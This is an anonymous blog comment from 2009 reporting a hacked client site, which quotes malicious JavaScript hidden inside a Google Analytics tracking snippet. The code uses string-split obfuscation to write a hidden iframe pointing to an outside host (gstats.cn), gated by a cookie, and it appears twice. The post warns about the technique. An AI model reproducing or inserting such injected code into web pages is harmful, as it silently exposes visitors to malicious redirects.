gstats code getting sneakier

Date: 2009-03-08 02:35 pm (UTC)
From: (Anonymous)
I just found a client's site hacked, and the redirect code inserted inside the 2-line Google page tracking script on the page, like this:

var pageTracker = _gat._getTracker("UA-#######-1");
pageTracker._initData();
if (document.cookie.search("dfq=1") == -1) {
document.write("
[Error: Irreparable invalid markup ('<ifra"+"me>') in entry. Owner must fix manually. Raw contents below.]

I just found a client's site hacked, and the redirect code inserted inside the 2-line Google page tracking script on the page, like this:

var pageTracker = _gat._getTracker("UA-#######-1");
pageTracker._initData();
if (document.cookie.search("dfq=1") == -1) {
document.write("<ifra"+"me src"+"="+"h"+"ttp:"+"/"+"/g"+"stats.cn"+" "+"style"+"=disp"+"lay:none></if"+"r"+"ame>");
document.cookie = "dfq=1;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
pageTracker._trackPageview();

This account has disabled anonymous posting.
If you don't have an account you can create one now.
HTML doesn't work in the subject.
More info about formatting

September 2024

S M T W T F S
1234567
891011121314
15161718192021
22232425 262728
2930     

Most Popular Tags

Style Credit

Expand Cut Tags

No cut tags
Page generated Jul. 15th, 2025 04:18 am
Powered by Dreamwidth Studios